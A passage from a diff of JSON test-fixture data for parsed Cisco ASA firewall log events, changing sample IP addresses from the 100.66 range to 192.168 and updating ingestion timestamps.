"172.31.98.44" ] }, @@ -14142,8 +14142,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168016200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", + "ingested": "2021-12-09T13:33:41.995786300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14159,7 +14159,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11829", "source_interface": "outside", "mapped_destination_port": 1295 @@ -14176,8 +14176,8 @@ }, "destination": { "port": 8300, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1296, @@ -14217,7 +14217,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14225,8 +14225,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168022600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300", + "ingested": "2021-12-09T13:33:41.995791200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14259,8 +14259,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14295,7 +14295,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14304,8 +14304,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168028700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", + "ingested": "2021-12-09T13:33:41.995797500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14321,7 +14321,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11830", "source_interface": "outside", "mapped_destination_port": 1296 @@ -14343,8 +14343,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14379,7 +14379,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14390,8 +14390,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168036500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", + "ingested": "2021-12-09T13:33:41.995802300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14428,8 +14428,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14464,7 +14464,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14475,8 +14475,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168041100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", + "ingested": "2021-12-09T13:33:41.995806900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14513,8 +14513,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14549,7 +14549,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14560,8 +14560,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168047600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", + "ingested": "2021-12-09T13:33:41.995810800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14593,8 +14593,8 @@ }, "destination": { "port": 8301, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1297, @@ -14634,7 +14634,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14642,8 +14642,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168052200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301", + "ingested": "2021-12-09T13:33:41.995815600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14676,8 +14676,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14712,7 +14712,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14721,8 +14721,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168057700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", + "ingested": "2021-12-09T13:33:41.995821900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14738,7 +14738,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11831", "source_interface": "outside", "mapped_destination_port": 1297 @@ -14755,8 +14755,8 @@ }, "destination": { "port": 8302, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1298, @@ -14796,7 +14796,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14804,8 +14804,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168064300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302", + "ingested": "2021-12-09T13:33:41.995828200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14838,8 +14838,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14874,7 +14874,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14883,8 +14883,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168070900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", + "ingested": "2021-12-09T13:33:41.995834400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14900,7 +14900,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11832", "source_interface": "outside", "mapped_destination_port": 1298 @@ -14922,8 +14922,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -14958,7 +14958,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -14967,8 +14967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168078600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995840700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -14984,7 +14984,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.9", + "mapped_source_ip": "192.168.179.9", "connection_id": "11833", "source_interface": "outside", "mapped_destination_port": 56132 @@ -15006,8 +15006,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -15042,7 +15042,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -15052,8 +15052,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.168084Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:33:41.995847Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15090,8 +15090,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15126,7 +15126,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15137,8 +15137,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168088400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", + "ingested": "2021-12-09T13:33:41.995853100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15170,8 +15170,8 @@ }, "destination": { "port": 8303, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1299, @@ -15211,7 +15211,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15219,8 +15219,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168093400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303", + "ingested": "2021-12-09T13:33:41.995859300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15253,8 +15253,8 @@ }, "source": { "port": 80, - "address": "100.66.247.99", - "ip": "100.66.247.99" + "address": "192.168.247.99", + "ip": "192.168.247.99" }, "tags": [ "preserve_original_event" @@ -15289,7 +15289,7 @@ "localhost" ], "ip": [ - "100.66.247.99", + "192.168.247.99", "172.31.98.44" ] }, @@ -15298,8 +15298,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168098600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", + "ingested": "2021-12-09T13:33:41.995865500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15315,7 +15315,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.247.99", + "mapped_source_ip": "192.168.247.99", "connection_id": "11834", "source_interface": "outside", "mapped_destination_port": 1299 @@ -15332,8 +15332,8 @@ }, "destination": { "port": 8304, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1300, @@ -15373,7 +15373,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15381,8 +15381,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168104300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304", + "ingested": "2021-12-09T13:33:41.995871800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15415,8 +15415,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15451,7 +15451,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15460,8 +15460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168111600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", + "ingested": "2021-12-09T13:33:41.995878100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15477,7 +15477,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11835", "source_interface": "outside", "mapped_destination_port": 1300 @@ -15499,8 +15499,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15535,7 +15535,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15546,8 +15546,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168117500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", + "ingested": "2021-12-09T13:33:41.995884200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15584,8 +15584,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15620,7 +15620,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15631,8 +15631,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168124100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", + "ingested": "2021-12-09T13:33:41.995890600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15664,8 +15664,8 @@ }, "destination": { "port": 8305, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1301, @@ -15705,7 +15705,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15713,8 +15713,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168132100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305", + "ingested": "2021-12-09T13:33:41.995898500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15747,8 +15747,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15783,7 +15783,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15792,8 +15792,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168137300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", + "ingested": "2021-12-09T13:33:41.995905200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15809,7 +15809,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11836", "source_interface": "outside", "mapped_destination_port": 1301 @@ -15826,8 +15826,8 @@ }, "destination": { "port": 8306, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1302, @@ -15867,7 +15867,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15875,8 +15875,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168142500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306", + "ingested": "2021-12-09T13:33:41.995911500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15909,8 +15909,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15945,7 +15945,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15954,8 +15954,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168148200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", + "ingested": "2021-12-09T13:33:41.995917800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15971,7 +15971,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11837", "source_interface": "outside", "mapped_destination_port": 1302 @@ -16009,8 +16009,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168158Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995924400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16056,8 +16056,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168167300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995929600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16103,8 +16103,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168173900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995934900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16150,8 +16150,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168178300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995941Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16197,8 +16197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168183900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995946200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16244,8 +16244,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168189100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995950600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16291,8 +16291,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168194200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995955600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16338,8 +16338,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168200400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995961900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16385,8 +16385,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168208500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995966600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16432,8 +16432,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168216300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995971600Z", + "original": "Oct 10 2018 12:34:56 